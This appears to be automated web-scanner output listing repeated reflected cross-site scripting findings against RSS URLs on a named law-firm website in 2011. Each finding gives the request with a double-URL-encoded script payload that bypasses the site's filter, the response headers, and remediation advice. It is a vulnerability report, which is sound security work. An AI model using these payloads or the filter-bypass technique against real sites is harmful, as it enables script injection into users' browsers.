GET /rss/practices8ddc1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11d8c833232/Election_Law__Government_Ethics/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de06e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97b01f23fb3 was submitted in the REST URL parameter 3. This input was echoed as de06e"><script>alert(1)</script>97b01f23fb3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Election_Law__Government_Ethicsde06e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97b01f23fb3/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d35d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1977a3e2ac was submitted in the REST URL parameter 4. This input was echoed as 6d35d"><script>alert(1)</script>1977a3e2ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Election_Law__Government_Ethics/rss.xml6d35d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1977a3e2ac HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 290f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18476e2452b was submitted in the REST URL parameter 1. This input was echoed as 290f3"><script>alert(1)</script>18476e2452b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss290f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18476e2452b/practices/Employment__Labor/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b5ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43dabe5a732 was submitted in the REST URL parameter 2. This input was echoed as 9b5ec"><script>alert(1)</script>43dabe5a732 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices9b5ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43dabe5a732/Employment__Labor/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28bea29faf8 was submitted in the REST URL parameter 3. This input was echoed as e75a9"><script>alert(1)</script>28bea29faf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Employment__Labore75a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28bea29faf8/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e26b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea05a8e876db was submitted in the REST URL parameter 4. This input was echoed as 7e26b"><script>alert(1)</script>a05a8e876db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Employment__Labor/rss.xml7e26b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea05a8e876db HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac191%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e408ea2dc39c was submitted in the REST URL parameter 1. This input was echoed as ac191"><script>alert(1)</script>408ea2dc39c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssac191%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e408ea2dc39c/practices/Environment__Safety/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faef9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09c7b47057d was submitted in the REST URL parameter 2. This input was echoed as faef9"><script>alert(1)</script>09c7b47057d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesfaef9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09c7b47057d/Environment__Safety/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf3bd752872 was submitted in the REST URL parameter 3. This input was echoed as 14f97"><script>alert(1)</script>df3bd752872 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Environment__Safety14f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf3bd752872/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9d96a6b3a12 was submitted in the REST URL parameter 4. This input was echoed as a8458"><script>alert(1)</script>9d96a6b3a12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Environment__Safety/rss.xmla8458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9d96a6b3a12 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53bc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c6054d33b2 was submitted in the REST URL parameter 1. This input was echoed as 53bc2"><script>alert(1)</script>4c6054d33b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss53bc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c6054d33b2/practices/Food__Drug_and_Product_Safety/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99d18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1c0da64d82 was submitted in the REST URL parameter 2. This input was echoed as 99d18"><script>alert(1)</script>a1c0da64d82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices99d18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1c0da64d82/Food__Drug_and_Product_Safety/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3670bef0e21 was submitted in the REST URL parameter 3. This input was echoed as de427"><script>alert(1)</script>3670bef0e21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Food__Drug_and_Product_Safetyde427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3670bef0e21/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f92a2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41efcd82b21 was submitted in the REST URL parameter 4. This input was echoed as f92a2"><script>alert(1)</script>41efcd82b21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Food__Drug_and_Product_Safety/rss.xmlf92a2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41efcd82b21 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6fba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4316059e06 was submitted in the REST URL parameter 1. This input was echoed as a6fba"><script>alert(1)</script>a4316059e06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssa6fba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4316059e06/practices/Franchise/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b78b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9778950fc0 was submitted in the REST URL parameter 2. This input was echoed as b78b0"><script>alert(1)</script>9778950fc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesb78b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9778950fc0/Franchise/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61790d4d9a8 was submitted in the REST URL parameter 3. This input was echoed as d4984"><script>alert(1)</script>61790d4d9a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Franchised4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61790d4d9a8/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e273c67fee0b was submitted in the REST URL parameter 4. This input was echoed as 214b4"><script>alert(1)</script>273c67fee0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Franchise/rss.xml214b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e273c67fee0b HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2dde%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed620a3a2e2 was submitted in the REST URL parameter 1. This input was echoed as f2dde"><script>alert(1)</script>ed620a3a2e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
